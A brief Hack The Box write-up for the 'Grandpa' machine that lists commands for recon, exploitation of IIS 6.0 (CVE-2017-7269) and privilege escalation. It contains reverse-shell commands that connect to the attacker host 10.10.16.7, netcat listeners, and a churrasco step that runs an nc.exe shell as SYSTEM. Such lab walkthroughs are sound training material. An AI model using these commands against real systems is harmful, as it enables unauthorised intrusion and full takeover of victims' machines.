PyUs3r

PyUs3r

Pentester, CTF player

Grandpa - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open --min-rate 5000 -vvv -n -Pn 10.10.10.14

  • Whatweb
whatweb http://10.10.10.14/

  • Gobuster

Exploitation

  • Buffer Overflow
searchsploit IIS 6.0

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

python2 exploit.py 10.10.10.14 80 10.10.16.7 9000

rlwrap nc -nlvp 9000

Post-exploitation

  • Check user privileges
whoami /priv

  • Check OS Version
systeminfo

  • Copy nc and churrasco
impacket-smbserver smbFolder -smb $(pwd) -smb2support

https://github.com/int0x33/nc.exe/blob/master/nc.exe

copy \\10.10.16.7\smbFolder\nc.exe

https://github.com/Re4son/Churrasco/blob/master/churrasco.exe

copy \\10.10.16.7\smbFolder\churrasco.exe
  • Run reverse shell as system
echo nc.exe 10.10.16.7 4444 -e cmd.exe > exploit.bat

churrasco.exe -d exploit.bat


rlwrap nc -nvlp 4444